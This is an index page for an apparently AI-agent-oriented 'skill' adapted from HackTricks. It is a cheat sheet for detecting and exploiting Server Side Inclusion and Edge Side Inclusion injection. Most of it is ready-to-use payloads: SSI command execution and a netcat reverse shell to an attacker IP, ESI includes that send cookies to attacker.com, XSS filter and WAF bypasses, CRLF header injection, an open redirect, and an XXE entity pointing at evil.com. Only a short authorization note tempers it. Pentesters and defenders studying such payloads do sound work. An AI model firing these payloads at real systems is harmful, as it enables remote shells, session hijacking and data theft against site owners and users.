OpenSkillIndex← back to search

Hacktricks-skills ssi-esi-injection

Detect and exploit Server Side Inclusion (SSI) and Edge Side Inclusion (ESI) injection vulnerabilities in web applications. Use this skill whenever you're doing web pentesting, testing for file inclusion vulnerabilities, cache poisoning attacks, or when you encounter .shtml/.shtm/.stm files, Surrogate-Control headers, or need to test for SSI/ESI injection points. This skill provides detection payloads, exploitation techniques, and methodology for SSI/ESI vulnerabilities.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/server-side-inclusion-edge-side-inclusion-injection/SKILL.MD
source content

SSI/ESI Injection Testing

A comprehensive guide for detecting and exploiting Server Side Inclusion (SSI) and Edge Side Inclusion (ESI) injection vulnerabilities.

When to Use This Skill

  • Testing web applications for file inclusion vulnerabilities
  • When you see 
    .shtml
    , 
    .shtm
    , or 
    .stm
    file extensions
  • When response headers contain 
    Surrogate-Control: content="ESI/1.0"
  • During cache poisoning or CDN exploitation testing
  • When you need to bypass XSS filters or steal cookies
  • Testing for SSRF via ESI includes

Detection Methodology

Step 1: Identify SSI Presence

Look for these indicators:

  • File extensions: 
    .shtml
    , 
    .shtm
    , 
    .stm
  • HTML comments in source containing 
    <!--#
    directives
  • Server configuration that processes SSI

Step 2: Identify ESI Presence

Check for:

  • Response header: 
    Surrogate-Control: content="ESI/1.0"
  • ESI tags being reflected or processed
  • CDN/cache layer in front of the application

Step 3: Test for Injection Points

Use the detection payloads below to test user-controllable input fields, URL parameters, and headers.

SSI Detection Payloads

Basic SSI Directives

<!--#echo var="DOCUMENT_NAME" -->
<!--#echo var="DATE_LOCAL" -->
<!--#printenv -->
<!--#set var="name" value="Rich" -->

File Inclusion Tests

<!--#include virtual="/index.html" -->
<!--#include file="file_to_include.html" -->
<!--#include virtual="file_to_include.html" -->
<!--#flastmod file="index.html" -->

Command Execution Tests

<!--#exec cmd="dir" -->
<!--#exec cmd="ls" -->
<!--#exec cmd="whoami" -->
<!--#exec cmd="id" -->

Reverse Shell (Advanced)

<!--#exec cmd="mkfifo /tmp/foo;nc <ATTACKER_IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

ESI Detection Payloads

Basic Detection

hell<!--esi-->o

If reflected as "hello", the application is vulnerable.

Blind Detection

<esi:include src=http://attacker.com>

Monitor your server for incoming requests.

Debug Detection (Akamai)

<esi:debug/>

ESI Exploitation Techniques

XSS via ESI

<esi:include src=http://attacker.com/xss.html>

Bypass XSS Filters

x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

WAF Bypass with <!--esi-->

<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
<img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>

Cookie Theft

Remote Cookie Steal

<esi:include src=http://attacker.com/$(HTTP_COOKIE)>
<esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />

Reflect HTTP_ONLY Cookies

<!--esi $(HTTP_COOKIE) -->
<!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->

Private Local File Access

<esi:include src="secret.txt">

CRLF Injection

<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>

Open Redirect

<!--esi $add_header('Location','http://attacker.com') -->

Add Custom Headers

<!--esi/$add_header('Content-Type','text/html')/-->
<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->

CRLF in Headers (CVE-2019-2438)

<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345
Host: anotherhost.com"/>
</esi:include>

ESI + XSLT = XXE

<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />

With XSLT file:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]>
<foo>&xxe;</foo>

ESI Software Capabilities

SoftwareIncludesVarsCookiesUpstream HeadersHost Whitelist
Squid3YesYesYesYesNo
Varnish CacheYesNoNoYesYes
FastlyYesNoNoNoYes
Akamai ETSYesYesYesNoNo
NodeJS esiYesYesYesNoNo
NodeJS nodesiYesNoNoNoOptional

Testing Workflow

  1. Reconnaissance: Identify if the target uses SSI or ESI
  2. Detection: Test input fields with detection payloads
  3. Enumeration: Map out what directives are supported
  4. Exploitation: Use appropriate payloads based on capabilities
  5. Verification: Confirm successful exploitation

Safety Notes

  • Always have proper authorization before testing
  • Command execution payloads can be destructive
  • Cookie theft should only be done on systems you own or have permission to test
  • Document all findings for responsible disclosure

References